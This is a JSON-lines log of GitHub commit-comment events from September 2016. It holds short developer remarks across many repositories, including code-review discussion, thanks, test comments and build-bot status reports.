{"id":"4553028378","type":"CommitCommentEvent","actor":{"login":"markkrueg"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18995094,"position":null,"line":null,"path":null,"commit_id":"a912c9a2658dbbf8321d5d063d63cf673825106c","created_at":"2016-09-13T02:09:32Z","updated_at":"2016-09-13T02:09:32Z","body":"Makes sense. Thanks for answering."}},"created_at":"2016-09-13T02:09:32Z"}
{"id":"4553031183","type":"CommitCommentEvent","actor":{"login":"dilbaggins"},"repo":{"name":"nZEDb/nZEDb"},"payload":{"comment":{"id":18995098,"position":null,"line":null,"path":null,"commit_id":"29bf095cc6903fefaa933517fac886536524ea50","created_at":"2016-09-13T02:10:31Z","updated_at":"2016-09-13T02:10:31Z","body":"no Forking.php in commit.."}},"created_at":"2016-09-13T02:10:31Z"}
{"id":"4553031599","type":"CommitCommentEvent","actor":{"login":"tomkersten"},"repo":{"name":"DanTheMan0000/koa-hello-world"},"payload":{"comment":{"id":18995100,"position":10,"line":11,"path":"index.js","commit_id":"4e1a91b3047ec76a358c012b96aa42a24c495c95","created_at":"2016-09-13T02:10:40Z","updated_at":"2016-09-13T02:10:40Z","body":"Note this comment/question. Please take a peek at it and think about it before trying it...I'm curious what you _think_ will happen and if what happens makes sense to you. We can discuss in Slack."}},"created_at":"2016-09-13T02:10:40Z"}
{"id":"4553033333","type":"CommitCommentEvent","actor":{"login":"justinmimbs"},"repo":{"name":"thebritican/elm-calendar"},"payload":{"comment":{"id":18995103,"position":null,"line":null,"path":null,"commit_id":"6ffe37b1273da07f04788806366721e7e90d3b9c","created_at":"2016-09-13T02:11:22Z","updated_at":"2016-09-13T02:11:22Z","body":"Right on! Thanks! I will do. 👍 "}},"created_at":"2016-09-13T02:11:22Z"}
{"id":"4553035990","type":"CommitCommentEvent","actor":{"login":"tomkersten"},"repo":{"name":"DanTheMan0000/koa-hello-world"},"payload":{"comment":{"id":18995106,"position":25,"line":22,"path":"index.js","commit_id":"4e1a91b3047ec76a358c012b96aa42a24c495c95","created_at":"2016-09-13T02:12:21Z","updated_at":"2016-09-13T02:12:21Z","body":"The `./public` is key here (vs just `/public`, as `/public` says to look in a completely different directory on  your laptop for the \"public\" directory. `./public` means \"the public dir inside the same directory as this file [the `index.js` file].\"\r\n\r\nDoes that makes sense?"}},"created_at":"2016-09-13T02:12:21Z"}
{"id":"4553039812","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"dmalan/tmp"},"payload":{"comment":{"id":18995113,"position":null,"line":null,"path":null,"commit_id":"555b627350f81dcce2699edbb9d9fca68104ac2b","created_at":"2016-09-13T02:13:51Z","updated_at":"2016-09-13T02:13:51Z","body":"comment 1\r\n"}},"created_at":"2016-09-13T02:13:51Z"}
{"id":"4553040026","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"dmalan/tmp"},"payload":{"comment":{"id":18995114,"position":1,"line":1,"path":"mario.c","commit_id":"555b627350f81dcce2699edbb9d9fca68104ac2b","created_at":"2016-09-13T02:13:55Z","updated_at":"2016-09-13T02:13:55Z","body":"comment 1"}},"created_at":"2016-09-13T02:13:55Z"}
{"id":"4553046909","type":"CommitCommentEvent","actor":{"login":"scottwed"},"repo":{"name":"scottwed/jupyter-kernel-jsr223"},"payload":{"comment":{"id":18995136,"position":null,"line":null,"path":null,"commit_id":"606c212d6ad8d98097259baad3f47e9e0fb1ce2b","created_at":"2016-09-13T02:16:29Z","updated_at":"2016-09-13T02:16:29Z","body":"Added an example for a kernel spec file for Jython on Windows"}},"created_at":"2016-09-13T02:16:29Z"}
{"id":"4553054642","type":"CommitCommentEvent","actor":{"login":"ozyx"},"repo":{"name":"SaddlebackCSS/SaddlebackCSS.github.io"},"payload":{"comment":{"id":18995142,"position":null,"line":null,"path":null,"commit_id":"4cf33baf98990563ca1910c732bc7343e6005a37","created_at":"2016-09-13T02:19:20Z","updated_at":"2016-09-13T02:19:20Z","body":"👌👌👌👍😆"}},"created_at":"2016-09-13T02:19:20Z"}
{"id":"4553057281","type":"CommitCommentEvent","actor":{"login":"FacticiusVir"},"repo":{"name":"FacticiusVir/SharpVk"},"payload":{"comment":{"id":18995147,"position":null,"line":null,"path":null,"commit_id":"eab5177a362823a2bd1ba374c488f3883f36d6a6","created_at":"2016-09-13T02:20:18Z","updated_at":"2016-09-13T02:20:18Z","body":"#14 "}},"created_at":"2016-09-13T02:20:18Z"}
{"id":"4553057359","type":"CommitCommentEvent","actor":{"login":"psykokwak4"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18995148,"position":82,"line":66,"path":"sdk/python/README.rst","commit_id":"e5328ffabd434da062ffa380e15871010eca64d9","created_at":"2016-09-13T02:20:19Z","updated_at":"2016-09-13T02:20:19Z","body":"Sorry, brought up this question out of ignorance."}},"created_at":"2016-09-13T02:20:19Z"}
{"id":"4553057800","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":18995149,"position":null,"line":null,"path":null,"commit_id":"72a6d73a9be23fd72ba98fbe74b2f14fbc840bfb","created_at":"2016-09-13T02:20:28Z","updated_at":"2016-09-13T02:20:28Z","body":"So beautiful. "}},"created_at":"2016-09-13T02:20:28Z"}
{"id":"4553058944","type":"CommitCommentEvent","actor":{"login":"jpsim"},"repo":{"name":"realm/realm-cocoa"},"payload":{"comment":{"id":18995151,"position":26,"line":67,"path":"docs/swift-3-api.diff","commit_id":"40d0210c4bde1e1d1af43a259af02c81c1721113","created_at":"2016-09-13T02:20:53Z","updated_at":"2016-09-13T02:20:53Z","body":"Is there really potential for confusion? What else could \"by\" mean? It hasn't tripped up any of our current users, as far as I know.\r\n\r\nI went with consistent arguments between the string property and sort descriptors. Otherwise it's `sorted(byProperty: \"intProp\")` and `sorted(by: [SortDescriptor(property: \"intProp\")])`. It could be `sorted(bySortDescriptors: [SortDescriptor(property: \"intProp\")])` but that's not in line with Swift 3 API guidelines of omitting the type from parameter labels.\r\n\r\nWhen you autocomplete, you'll see the placeholder with the internal label name anyway."}},"created_at":"2016-09-13T02:20:53Z"}
{"id":"4553059437","type":"CommitCommentEvent","actor":{"login":"MathWhiz"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":18995155,"position":null,"line":null,"path":null,"commit_id":"72a6d73a9be23fd72ba98fbe74b2f14fbc840bfb","created_at":"2016-09-13T02:21:05Z","updated_at":"2016-09-13T02:21:05Z","body":"It is lovely\nOn Mon, Sep 12, 2016 at 9:20 PM Blade Barringer <notifications@github.com>\nwrote:\n\n> So beautiful.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/HabitRPG/habitrpg/commit/72a6d73a9be23fd72ba98fbe74b2f14fbc840bfb#commitcomment-18995149>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALz_84NNBJHsnIkAerpo72uLLQAWE-Ryks5qpghygaJpZM4J7Oc7>\n> .\n>\n"}},"created_at":"2016-09-13T02:21:05Z"}
{"id":"4553060762","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18995158,"position":null,"line":null,"path":null,"commit_id":"0247aa65275b8b3f505fd29044f3a0d4f14c26ba","created_at":"2016-09-13T02:21:36Z","updated_at":"2016-09-13T02:21:36Z","body":"Running the parser and well-formedness checker in realtime is a complete non-starter, for the simple reason that they both presume complete programs, and in-progress typing is the opposite of that.  Building an incremental parser that doesn't barf pretty much constantly and complain about pretty much everything is a *massive* engineering effort.  (For example, Eclipse has been working on it for a decade or two; they've only semi-recently gotten it to not suck.)  Plus, as was pointed out, they're not fast, and spending cycles slowing down the browser is probably not a good move right now.  I do not think we should sink any dev effort into this; it's not worth the payoff.\r\n\r\nIn terms of having positive feedback, sure, that's nice:  a dopamine reward is a good way to encourage people to stick with something.  But I don't think the UI should resemble a Candy Crush win; I think it's it's undignified, and undercuts our credibility."}},"created_at":"2016-09-13T02:21:36Z"}
{"id":"4553061415","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"dmalan/tmp"},"payload":{"comment":{"id":18995159,"position":null,"line":null,"path":null,"commit_id":"a2d6a18591b7891eb47d65500dd65d1c31b64b86","created_at":"2016-09-13T02:21:49Z","updated_at":"2016-09-13T02:21:49Z","body":"test"}},"created_at":"2016-09-13T02:21:49Z"}
{"id":"4553066037","type":"CommitCommentEvent","actor":{"login":"sgidlhy"},"repo":{"name":"sgidlhy/test"},"payload":{"comment":{"id":18995168,"position":null,"line":null,"path":null,"commit_id":"9264cd1341fed8b4cec54ef019b91e152fc613bd","created_at":"2016-09-13T02:23:32Z","updated_at":"2016-09-13T02:23:32Z","body":"<h2>love</h2>"}},"created_at":"2016-09-13T02:23:32Z"}
{"id":"4553066383","type":"CommitCommentEvent","actor":{"login":"AlanNunez"},"repo":{"name":"AlanNunez/hello-world"},"payload":{"comment":{"id":18995170,"position":null,"line":null,"path":null,"commit_id":"b9a77bde8b66398d4d1a28e154d57e404f9f9b4f","created_at":"2016-09-13T02:23:41Z","updated_at":"2016-09-13T02:23:41Z","body":"#Rolling back!"}},"created_at":"2016-09-13T02:23:41Z"}
{"id":"4553071486","type":"CommitCommentEvent","actor":{"login":"zschwein"},"repo":{"name":"zschwein/django_app"},"payload":{"comment":{"id":18995182,"position":null,"line":null,"path":null,"commit_id":"5a7efd39ee88097fe44a4b8634cc44cfe040bc55","created_at":"2016-09-13T02:25:31Z","updated_at":"2016-09-13T02:25:31Z","body":"first upload from local dir"}},"created_at":"2016-09-13T02:25:31Z"}
{"id":"4553074189","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18995187,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-13T02:26:28Z","updated_at":"2016-09-13T02:26:28Z","body":"You could get a total number of tests by adding the number of required tests plus the minimum optional tests.\r\nNote that 4 - number of optional tests errors gives you how many optional tests you passed. But this number should not be allowed to exceed the minimum number of allowed optional tests. So use a ternary operator to kick it down if it exceeds that number. And add this to required tests.\r\nThen make this a percentage over the total number of tests.\r\n\r\nYou would lose the pretty colours of the current progress bar, but it would work."}},"created_at":"2016-09-13T02:26:28Z"}
{"id":"4553075678","type":"CommitCommentEvent","actor":{"login":"cjfields"},"repo":{"name":"bioperl/bioperl-live"},"payload":{"comment":{"id":18995190,"position":null,"line":null,"path":null,"commit_id":"e5023eef64adfb4e41598670c14d4e99789ea37c","created_at":"2016-09-13T02:27:04Z","updated_at":"2016-09-13T02:27:04Z","body":"@muffato i can do that but there won't be another 1.6.x release, I'm planning on a final 1.7.0 release candidate this week, then a full 1.7.0 release soon after."}},"created_at":"2016-09-13T02:27:04Z"}
{"id":"4553081709","type":"CommitCommentEvent","actor":{"login":"dbavatar"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18995199,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-13T02:29:16Z","updated_at":"2016-09-13T02:29:16Z","body":"On Mon, Sep 12, 2016 at 9:18 PM, caall99 <notifications@github.com> wrote:\n\n> Lol! I got it working. But i had to use the 4.9.2 tool chain. I also\n> changed optimization from -Os to -O2. It didn't like it when i changed\n> optimization settings in two locations of the file -that's what caused the\n> blank screen. Heating up right now - about to print something I printed\n> earlier, which is a perfect test to see if the hammering got fixed!\n>\n\nIt should be better but I guarantee it isn't fixed :-(\n"}},"created_at":"2016-09-13T02:29:16Z"}
{"id":"4553092392","type":"CommitCommentEvent","actor":{"login":"dinatale2"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18995219,"position":63,"line":357,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T02:33:07Z","updated_at":"2016-09-13T02:33:07Z","body":"Do you want me to increase it for now and then we can lower it as necessary?"}},"created_at":"2016-09-13T02:33:07Z"}
{"id":"4553093456","type":"CommitCommentEvent","actor":{"login":"oceanstack"},"repo":{"name":"ArduPilot/PX4Firmware"},"payload":{"comment":{"id":18995223,"position":null,"line":null,"path":null,"commit_id":"4f1bb33304ad1c334e2dc5450b2c6e69e63d4bff","created_at":"2016-09-13T02:33:28Z","updated_at":"2016-09-13T02:33:28Z","body":"Thank you very much !"}},"created_at":"2016-09-13T02:33:28Z"}
{"id":"4553097487","type":"CommitCommentEvent","actor":{"login":"dinatale2"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18995231,"position":61,"line":355,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T02:35:03Z","updated_at":"2016-09-13T02:35:03Z","body":"I'm implementing this in the same way I implemented DEFAULT_ZFSTESTS_RUNFILE."}},"created_at":"2016-09-13T02:35:03Z"}
{"id":"4553099389","type":"CommitCommentEvent","actor":{"login":"chunlinyao"},"repo":{"name":"moqui/moqui-framework"},"payload":{"comment":{"id":18995235,"position":144,"line":227,"path":"framework/src/main/groovy/org/moqui/impl/screen/ScreenUrlInfo.groovy","commit_id":"d2933518f438cb3e5ead16bd5c5a8a0d190038fc","created_at":"2016-09-13T02:35:41Z","updated_at":"2016-09-13T02:35:41Z","body":"When debug into this line, I found the `screenPathDefList` have duplicate entries. It seems `screenPathDefList` always contains a `fromSd` followed by `ScreenDefinition` of full path elements. Should duplicate entries be contained in `screenPathDefList`? \r\n\r\n    0 = {ScreenDefinition@27052} \"component://webroot/screen/webroot/apps.xml\"\r\n    1 = {ScreenDefinition@27052} \"component://webroot/screen/webroot/apps.xml\"\r\n    2 = {ScreenDefinition@27067} \"component://SimpleScreens/screen/MyAccount.xml\"\r\n    3 = {ScreenDefinition@27068} \"component://SimpleScreens/screen/MyAccount/User.xml\"\r\n    4 = {ScreenDefinition@27069} \"component://SimpleScreens/screen/MyAccount/User/Notifications.xml\""}},"created_at":"2016-09-13T02:35:41Z"}
{"id":"4553103045","type":"CommitCommentEvent","actor":{"login":"bmack2xula"},"repo":{"name":"bmack2xula/Feed-Me-Prototype"},"payload":{"comment":{"id":18995240,"position":null,"line":null,"path":null,"commit_id":"8e413f3588d05529cb1ee0bca0e22ee149f7b5af","created_at":"2016-09-13T02:37:05Z","updated_at":"2016-09-13T02:37:05Z","body":"Added a label with the restaurant name.  "}},"created_at":"2016-09-13T02:37:05Z"}
{"id":"4553108657","type":"CommitCommentEvent","actor":{"login":"dbavatar"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18995251,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-13T02:39:16Z","updated_at":"2016-09-13T02:39:16Z","body":"On Mon, Sep 12, 2016 at 7:20 PM, Dan Newman <notifications@github.com> wrote:\n\n> No, I merged it first. Pain in the neck otherwise since git isn't our primary development source control\n> system. git is just how we make the sources public. Behind the scenes we use a private svn repo.\n>\n> Dan\n\nWow that's gotta be a huge pain. I guess I'll rebase to master for\nfuture changes. It should be pretty easy to switch to git at this\npoint, no?\n"}},"created_at":"2016-09-13T02:39:16Z"}
{"id":"4553113297","type":"CommitCommentEvent","actor":{"login":"Razhenkov"},"repo":{"name":"Razhenkov/Gitexp"},"payload":{"comment":{"id":18995264,"position":4,"line":15,"path":"Gitexp/Gitexp/Program.cs","commit_id":"aa9891ea711496913a2e330b503e64547d0e6f76","created_at":"2016-09-13T02:40:58Z","updated_at":"2016-09-13T02:40:58Z","body":"Good stuff"}},"created_at":"2016-09-13T02:40:58Z"}
{"id":"4553113356","type":"CommitCommentEvent","actor":{"login":"brendanredinger"},"repo":{"name":"brendanredinger/snowboarding"},"payload":{"comment":{"id":18995265,"position":5,"line":5,"path":"index.html","commit_id":"f8958476941b8bbeab68a97b0a1b7f322f46cac2","created_at":"2016-09-13T02:40:59Z","updated_at":"2016-09-13T02:40:59Z","body":"need help here"}},"created_at":"2016-09-13T02:40:59Z"}
{"id":"4553113458","type":"CommitCommentEvent","actor":{"login":"bdash"},"repo":{"name":"realm/realm-cocoa"},"payload":{"comment":{"id":18995266,"position":26,"line":67,"path":"docs/swift-3-api.diff","commit_id":"40d0210c4bde1e1d1af43a259af02c81c1721113","created_at":"2016-09-13T02:41:02Z","updated_at":"2016-09-13T02:41:02Z","body":"The API guidelines say that the type should be included in argument labels when the argument is weakly-typed, such as a string for a key path or an integer in some specific units. That is not relevant to the `SortDescriptor` version of the function, but is clearly applicable to the version that takes a string."}},"created_at":"2016-09-13T02:41:02Z"}
{"id":"4553117327","type":"CommitCommentEvent","actor":{"login":"devsejong"},"repo":{"name":"codechobostudy/movie-api"},"payload":{"comment":{"id":18995270,"position":114,"line":87,"path":"src/main/java/io/codechobo/domain/member/Member.java","commit_id":"0acd11a72f9f5e25beafc665ab393d38d827c89b","created_at":"2016-09-13T02:42:28Z","updated_at":"2016-09-13T02:42:28Z","body":"포인트 증가에 따른 레벨변경을 도메인에서 직접 처리하도록 위임한다면 서비스레이어가 좀 더 간결해지지 않을까 싶네요."}},"created_at":"2016-09-13T02:42:28Z"}
{"id":"4553118530","type":"CommitCommentEvent","actor":{"login":"jpsim"},"repo":{"name":"realm/realm-cocoa"},"payload":{"comment":{"id":18995273,"position":26,"line":67,"path":"docs/swift-3-api.diff","commit_id":"40d0210c4bde1e1d1af43a259af02c81c1721113","created_at":"2016-09-13T02:42:56Z","updated_at":"2016-09-13T02:42:56Z","body":"Agreed, but it does lose a certain symmetry in the two flavors of the method: `sorted(byProperty: \"intProp\")` and `sorted(by: [SortDescriptor(property: \"intProp\")])`.\r\n\r\nI don't feel that strongly about it, so let's go with `byProperty`, and `ofProperty` for the aggregate methods."}},"created_at":"2016-09-13T02:42:56Z"}
{"id":"4553119702","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18995276,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-13T02:43:22Z","updated_at":"2016-09-13T02:43:22Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - i386-Windows-7-VisualStudio-12: OK (2335 of 2335 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-13T02:43:22Z"}
{"id":"4553120064","type":"CommitCommentEvent","actor":{"login":"boiboi1234"},"repo":{"name":"seomoz/SEOmozAPISamples"},"payload":{"comment":{"id":18995278,"position":null,"line":null,"path":null,"commit_id":"247642127f5b99ac5f9c09f8a08bb7946cc928d5","created_at":"2016-09-13T02:43:31Z","updated_at":"2016-09-13T02:43:31Z","body":"I am not a programmer but I am helping out my Programming guy by translating the code/bug/sources/fixes.  I have only one question, Our company using MOZ API. Have anyone encounter such situation as, \r\n\r\n**Sending the $batchedDomains 5o domains per request, and getting $contents only for 49 row ? Have anyone ?**"}},"created_at":"2016-09-13T02:43:31Z"}
{"id":"4553125239","type":"CommitCommentEvent","actor":{"login":"xiongtx"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18995289,"position":8,"line":243,"path":"helm-org.el","commit_id":"7fcf4f8b62fb7cd136f3eb08b6316a8f022a6031","created_at":"2016-09-13T02:45:30Z","updated_at":"2016-09-13T02:45:30Z","body":"The `org-previous-visible-heading` function is introduced in Org-mode [version 8.3](http://orgmode.org/cgit.cgi/org-mode.git/plain/etc/ORG-NEWS). It and its counterpart `org-next-visible-heading` are not available in Emacs 24.5.50.1, which uses version 8.2.10."}},"created_at":"2016-09-13T02:45:30Z"}
{"id":"4553126590","type":"CommitCommentEvent","actor":{"login":"forestwolff"},"repo":{"name":"forestwolff/forest-wolf-computers-001"},"payload":{"comment":{"id":18995292,"position":null,"line":null,"path":null,"commit_id":"441069690f4cf45c1cc1e938d66942bf892b7fe5","created_at":"2016-09-13T02:45:59Z","updated_at":"2016-09-13T02:45:59Z","body":"Amigos\r\nUm desktop Asus + intel i5 com 08 GB RAM e 1000 GB de HD.\r\nUm notebook Gateway + intel i5 com 08 GB RAM e 500 GB de HD.\r\nLinux desde 2000.  Mandrake, Kurumin, Ubuntu, Linux Mint (Mate).\r\n...\r\nAbraços"}},"created_at":"2016-09-13T02:45:59Z"}
{"id":"4553132295","type":"CommitCommentEvent","actor":{"login":"DD2XAlpha"},"repo":{"name":"DD2XAlpha/Calculator_Simple_RUBY"},"payload":{"comment":{"id":18995311,"position":null,"line":null,"path":null,"commit_id":"115e5aba2d46fe9fde844af46a3f38fa6a39a9bb","created_at":"2016-09-13T02:48:07Z","updated_at":"2016-09-13T02:48:07Z","body":"This RUBY app is on spanish.\r\nPlease take the code on calculator.rb for english translate"}},"created_at":"2016-09-13T02:48:07Z"}
{"id":"4553138990","type":"CommitCommentEvent","actor":{"login":"ekyl"},"repo":{"name":"ekyl/beginner-ruby"},"payload":{"comment":{"id":18995319,"position":null,"line":null,"path":null,"commit_id":"7d0bff871013eaf97718a1a19f1a4f9d76fed98a","created_at":"2016-09-13T02:50:33Z","updated_at":"2016-09-13T02:50:33Z","body":"This commit message was erroneous; it was not a creation but a rewrite."}},"created_at":"2016-09-13T02:50:33Z"}
{"id":"4553140081","type":"CommitCommentEvent","actor":{"login":"1806387992"},"repo":{"name":"1806387992/hello-world"},"payload":{"comment":{"id":18995323,"position":2,"line":2,"path":"README.md","commit_id":"01c0ef93ee7ec5282ac25caf411c9bbb916088a8","created_at":"2016-09-13T02:50:58Z","updated_at":"2016-09-13T02:50:58Z","body":"today is thirteenth September."}},"created_at":"2016-09-13T02:50:58Z"}
{"id":"4553140252","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":18995325,"position":5,"line":5,"path":"components/notification/index.en-US.md","commit_id":"59d7a7ee2df7b70e2cdaa998cb0de8723e0153a9","created_at":"2016-09-13T02:51:02Z","updated_at":"2016-09-13T02:51:02Z","body":"额。。这是 typo 还是有意为之。"}},"created_at":"2016-09-13T02:51:02Z"}
{"id":"4553140469","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18995326,"position":22,"line":29,"path":"tabbycat/draw/templates/admin/draw/debate/change_form.html","commit_id":"5a22d986f01f241e063216b9bd93ab4f20a11d1f","created_at":"2016-09-13T02:51:06Z","updated_at":"2016-09-13T02:51:06Z","body":"@philipbelesky heads-up, the function also needs to be called on load otherwise either it won't show if the page loads on the debate teams tab (you can load the page with the location hash already set), or it won't hide if the page loads on a different tab, depending on which the default is.\r\n\r\nI was a little worried that this approach would interfere with Jet's on-hash-change and on-load hooks. It all seems to be working fine though. Does Jet use some other hook, or are browsers smart enough to figure out they both need to happen?"}},"created_at":"2016-09-13T02:51:06Z"}
{"id":"4553147998","type":"CommitCommentEvent","actor":{"login":"CestDiego"},"repo":{"name":"melpa/melpa"},"payload":{"comment":{"id":18995341,"position":5,"line":4,"path":"recipes/all-the-icons","commit_id":"ad9dcd90251abacbba55c52dcb3e879758aaba38","created_at":"2016-09-13T02:53:56Z","updated_at":"2016-09-13T02:53:56Z","body":"@domtronn is there a reason why the fonts aren't included?"}},"created_at":"2016-09-13T02:53:56Z"}
{"id":"4553148084","type":"CommitCommentEvent","actor":{"login":"I-AM-Nishanth"},"repo":{"name":"I-AM-Nishanth/angular-QI"},"payload":{"comment":{"id":18995343,"position":null,"line":null,"path":null,"commit_id":"83b391f6f17cf5ab73ffd057aadb0d9a53e920c3","created_at":"2016-09-13T02:53:59Z","updated_at":"2016-09-13T02:53:59Z","body":"test"}},"created_at":"2016-09-13T02:53:59Z"}
{"id":"4553153447","type":"CommitCommentEvent","actor":{"login":"mythopoeic"},"repo":{"name":"mythopoeic/VBA"},"payload":{"comment":{"id":18995355,"position":7,"line":7,"path":"algorithms.bas","commit_id":"2b9d66c4c46462d6f66bdc56977fb1b3734f32f3","created_at":"2016-09-13T02:56:04Z","updated_at":"2016-09-13T02:56:04Z","body":"JS algorithms converted to VBA functions"}},"created_at":"2016-09-13T02:56:04Z"}
{"id":"4553159594","type":"CommitCommentEvent","actor":{"login":"tony-kerz"},"repo":{"name":"mzabriskie/axios"},"payload":{"comment":{"id":18995366,"position":null,"line":null,"path":null,"commit_id":"4c4e648f409de9cddc1b392b7695d5e4864fa561","created_at":"2016-09-13T02:58:24Z","updated_at":"2016-09-13T02:58:24Z","body":"thanks nick, \r\n\r\ni got the idea from reading [this s/o question (and it's comments) (http://stackoverflow.com/a/16585243/2371903). \r\n\r\njust for my edification, can you describe why you like going at `hasOwnProperty` via the prototype here? \r\n\r\nis it the performance benefit of not traveling the prototype chain, or are there some other potential gotchas?\r\n\r\nregards,\r\ntony."}},"created_at":"2016-09-13T02:58:24Z"}
{"id":"4553159681","type":"CommitCommentEvent","actor":{"login":"hans0209"},"repo":{"name":"hans0209/OSS_CS01"},"payload":{"comment":{"id":18995367,"position":null,"line":null,"path":null,"commit_id":"2919d16340cd6bf80a7affac29062ecb5265370f","created_at":"2016-09-13T02:58:26Z","updated_at":"2016-09-13T02:58:26Z","body":"add #include \"stdlib.h\" 추가하세요."}},"created_at":"2016-09-13T02:58:26Z"}
{"id":"4553160633","type":"CommitCommentEvent","actor":{"login":"hans0209"},"repo":{"name":"hans0209/OSS_CS01"},"payload":{"comment":{"id":18995369,"position":2,"line":2,"path":"gistfile1.txt","commit_id":"2919d16340cd6bf80a7affac29062ecb5265370f","created_at":"2016-09-13T02:58:50Z","updated_at":"2016-09-13T02:58:50Z","body":"#include \"stdlib.h\""}},"created_at":"2016-09-13T02:58:50Z"}
{"id":"4553161937","type":"CommitCommentEvent","actor":{"login":"hans0209"},"repo":{"name":"hans0209/OSS_CS01"},"payload":{"comment":{"id":18995374,"position":6,"line":6,"path":"gistfile1.txt","commit_id":"2919d16340cd6bf80a7affac29062ecb5265370f","created_at":"2016-09-13T02:59:19Z","updated_at":"2016-09-13T02:59:19Z","body":"system(\"pause\");"}},"created_at":"2016-09-13T02:59:19Z"}
{"id":"4557917195","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19007779,"position":null,"line":null,"path":null,"commit_id":"a541e2aaf38bf4cb2c5f7b722ba6338e4ddf781c","created_at":"2016-09-13T20:00:59Z","updated_at":"2016-09-13T20:00:59Z","body":"You don't need to write 'pull <filename>' because you don't pull a specific file. You always pull all the changes that have been made in the repo. So just write \"Pull master branch of origin\"."}},"created_at":"2016-09-13T20:00:59Z"}
{"id":"4557923323","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo-data"},"payload":{"comment":{"id":19007790,"position":null,"line":null,"path":null,"commit_id":"41a24bba3623238b1b8bb384e6c687c708d1a0ee","created_at":"2016-09-13T20:02:04Z","updated_at":"2016-09-13T20:02:04Z","body":"👍 Works!"}},"created_at":"2016-09-13T20:02:04Z"}
{"id":"4557931280","type":"CommitCommentEvent","actor":{"login":"General-Beck"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":19007805,"position":4,"line":4,"path":"script/deploy.sh","commit_id":"a8724848917076a63edb736e05b62fe84496864e","created_at":"2016-09-13T20:03:30Z","updated_at":"2016-09-13T20:03:30Z","body":"sorry, typo error"}},"created_at":"2016-09-13T20:03:30Z"}
{"id":"4557935626","type":"CommitCommentEvent","actor":{"login":"anthonywebb1"},"repo":{"name":"jdolan/quetoo-data"},"payload":{"comment":{"id":19007821,"position":null,"line":null,"path":null,"commit_id":"41a24bba3623238b1b8bb384e6c687c708d1a0ee","created_at":"2016-09-13T20:04:20Z","updated_at":"2016-09-13T20:04:20Z","body":"Excellent! [😊]\r\n\r\n\r\n________________________________\r\nFrom: Jay Dolan <notifications@github.com>\r\nSent: 13 September 2016 21:02\r\nTo: jdolan/quetoo-data\r\nCc: anthonywebb1; Author\r\nSubject: Re: [jdolan/quetoo-data] Quad damage sounds (41a24bb)\r\n\r\n\r\n👍 Works!\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/jdolan/quetoo-data/commit/41a24bba3623238b1b8bb384e6c687c708d1a0ee#commitcomment-19007790>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AUQ-hd6KXdkmedapZxToOqNhMSef7N4Nks5qpwE8gaJpZM4J8FVB>.\r\n"}},"created_at":"2016-09-13T20:04:20Z"}
{"id":"4557938350","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19007828,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:04:51Z","updated_at":"2016-09-13T20:04:51Z","body":"See the code on left and right of line number 24 (below MAIN SECTION). At this point, the indentation was correct but you have reduced the indentation and now it has become incorrect."}},"created_at":"2016-09-13T20:04:51Z"}
